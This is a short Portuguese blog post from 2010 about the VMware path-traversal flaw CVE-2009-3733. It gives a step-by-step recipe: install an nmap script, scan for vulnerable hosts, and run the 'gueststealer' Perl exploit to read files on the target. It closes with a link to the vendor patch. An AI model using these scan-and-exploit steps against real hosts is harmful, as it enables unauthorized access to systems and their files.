					
Filed Under: Security, Virtualização by admin — Leave a comment

					
11 de fevereiro de 2010

				

			


			

				
Olá gente!! vou escrever rapidamente pois o tempo esta curto…


Vc leu o nome do post e se assustou? isso mesmo, vc tem motivos para isso!  Semana passada na shmoocon foi exposta uma falha em produtos vmware que afetam as versões server, esx e esxi, sendo assim, um acesso fácil aos arquivos do host vulnerável. Referencia: CVE-2009-3733


Não demorou muito e já surgiu um plugin do nmap para localizar esses hosts vulneráveis e juntamente com o xploit é possível ter acesso ao alvo facilmente, segue abaixo uma receita rápida e direta!


1) Baixar os arquivos: Plugin e xploit


2) Instalar o plugin do nmap: em máquinas windows, os plugins estão localizado neste caminho:  c:\Program Files\Nmap\Scripts


Em máquinas linux:

/usr/share/nmap/scripts

/usr/local/share/nmap/scripts


Talvez precise baixar umas libs para o lua: http://nmap.org/svn/liblua/


Agora é só atualizar a base: # nmap –script-updatedb


3) Nmap neles!!


nmap -v -p 80,443 -T4 –script http-vmware-path-vuln <ip>


Além de uma seríe de informações será retornado tb, em letras grandes: VULNERABLE


4) Xploit!


Executar o xploit: # perl gueststealer-v1.pl , lembrando que é necessário algumas dependência de módulos perl para executar,(descrito no fonte) informar os parêmetros que será solicitado (ip, porta, versão etc..) e pronto!!


5) Patch!!


Aplique o patch imediatamente!! http://www.vmware.com/security/advisories/VMSA-2009-0015.html


[]‘s Sergito

			


			

				
Tags: , , 

				

					
													Comment